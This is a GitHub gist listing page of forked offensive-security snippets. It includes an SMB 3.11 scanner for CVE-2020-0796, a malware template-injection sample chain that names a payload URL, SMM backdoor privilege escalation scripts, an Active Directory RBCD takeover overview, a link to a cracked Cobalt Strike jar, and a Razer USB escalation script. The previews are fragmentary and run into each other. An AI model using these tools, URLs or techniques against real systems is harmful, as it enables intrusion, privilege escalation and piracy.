Jermain La Force jermainlaforce

  • Toronto
@jermainlaforce
jermainlaforce / check-smb-v3.11.sh
Created March 11, 2020 18:41 — forked from nikallass/check-smb-v3.11.sh
CVE-2020-0796. Scan HOST/CIDR with nmap script smb-protocols.nse and grep SMB version 3.11.
#!/bin/bash
# Usage check: the script needs exactly one target argument (an IP or a CIDR range).
if [ $# -eq 0 ]
then
echo $'Usage:\n\tcheck-smb-v3.11.sh TARGET_IP_or_CIDR'
exit 1
fi
echo "Checking if there's SMB v3.11 in" "$1" "..."
# Run the nmap smb-protocols script, keep only "Nmap scan report for <ip>" lines and the
# "3.11" dialect lines, fold the output into one record per host, and print the IPs of
# hosts that advertised SMB 3.11. The record separator is rewritten with sed rather than
# the MySQL-only "replace" utility so the pipeline runs on a stock system.
nmap -p445 --script smb-protocols -Pn -n "$1" | grep -P '\d+\.\d+\.\d+\.\d+|^\|.\s+3.11' | tr '\n' ' ' | sed 's/Nmap scan report for/@/g' | tr '@' '\n' | grep 3.11 | tr '|' ' ' | tr '_' ' ' | grep -oP '\d+\.\d+\.\d+\.\d+'
<?php
// Usage: php gd-gif.php image.gif gd-image.gif
// Load a GIF with GD and write it back out, i.e. re-encode it through the GD library.
$gif = imagecreatefromgif($argv[1]);
imagegif($gif, $argv[2]);
imagedestroy($gif);
?>
@jermainlaforce
jermainlaforce / sample chain
Created May 26, 2020 04:32 — forked from JohnLaTwC/sample chain
Template injection attack 0733b16e7f871c095c124a5da28c554d3e8861d8160d879dbb2c0bc4668012b9
## Sample hash:
## DOCX: 0733b16e7f871c095c124a5da28c554d3e8861d8160d879dbb2c0bc4668012b9
## template injection: 79658efd6d19e0704902af2ea9e3a30a7c2dc624e7195998e3af3c2289877b8d
## VBS: 9d77e8df4dc2c49594dac3bed4373051f3b9dd5f1228d1eeeb63f5d8048d9685
## Payload: 6d3d5cc0a0b26be8180ae4ade5f5cec26c94d06754a62251869d832ac6fe1c0c
## http://moveis-schuster-com.ga/Order.jpg returns:
import requests
import time
import sys
from base64 import b64encode
from requests_ntlm2 import HttpNtlmAuth
from urllib3.exceptions import InsecureRequestWarning
from urllib import quote_plus
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
#!/usr/bin/env python
import sys, os, time, platform, ctypes
from struct import pack, unpack
from optparse import OptionParser, make_option
import smm_backdoor as bd
# how many seconds to wait for the VM exit to occur
VM_EXIT_WAIT = 3
@jermainlaforce
jermainlaforce / smm_backdoor_privesc_win.py
Created June 16, 2021 21:26 — forked from Cr4sh/smm_backdoor_privesc_win.py
Example program that uses SMM backdoor for local privileges escalation under the Windows
#!/usr/bin/env python
import sys, os, platform, ctypes, ctypes.wintypes
from struct import pack, unpack
import smm_backdoor as bd
# MSR register used by swapgs
IA32_KERNEL_GS_BASE = 0xc0000102
@jermainlaforce
jermainlaforce / Workstation-Takeover.md
Created July 26, 2021 15:46 — forked from gladiatx0r/Workstation-Takeover.md
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure

Overview

In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. In short, this is accomplished by:

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

@jermainlaforce
jermainlaforce / cobaltstrike.crack
Created August 5, 2021 04:20 — forked from wonderkun/cobaltstrike.crack
cobaltstrike.crack
http://transfer.sh3ll.me/K3wEk/cobaltstrike.jar.patch
@jermainlaforce
jermainlaforce / usbgadget_razer.sh
Created August 22, 2021 13:58 — forked from tothi/usbgadget_razer.sh
Razer USB gadget on Android for Local Privilege Escalation on Windows
# MINIMAL USB gadget setup using CONFIGFS for simulating Razer Gaming HID
# devices for triggering the vulnerable Windows Driver installer
# credits for the Windows Driver install vuln: @j0nh4t
#
# https://twitter.com/j0nh4t/status/1429049506021138437
# https://twitter.com/an0n_r0/status/1429263450748895236
#
# the script was developed & tested on Android LineageOS 18.1